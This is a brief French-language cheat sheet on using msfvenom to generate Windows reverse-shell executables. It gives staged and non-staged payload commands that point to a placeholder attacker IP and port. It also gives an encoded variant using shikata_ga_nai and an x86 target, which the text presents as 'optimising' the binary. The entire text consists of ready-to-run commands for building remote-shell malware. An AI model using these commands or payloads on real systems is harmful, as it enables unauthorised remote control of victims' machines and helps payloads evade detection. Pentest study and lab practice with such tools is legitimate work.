MSFVenom
Générer un reverse shell
# non staged Windows binary
msfvenom -p windows/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe -o pe.exe
# staged Windows binary
msfvenom -p windows/shell/reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe -o pe.exe
Optimiser le binaire
Il est possible d’encoder le payload ou bien de changer l’architecture cible (x86 au lieu de x64).
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder /x86/shikata_ga_nai LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe -o pe.exe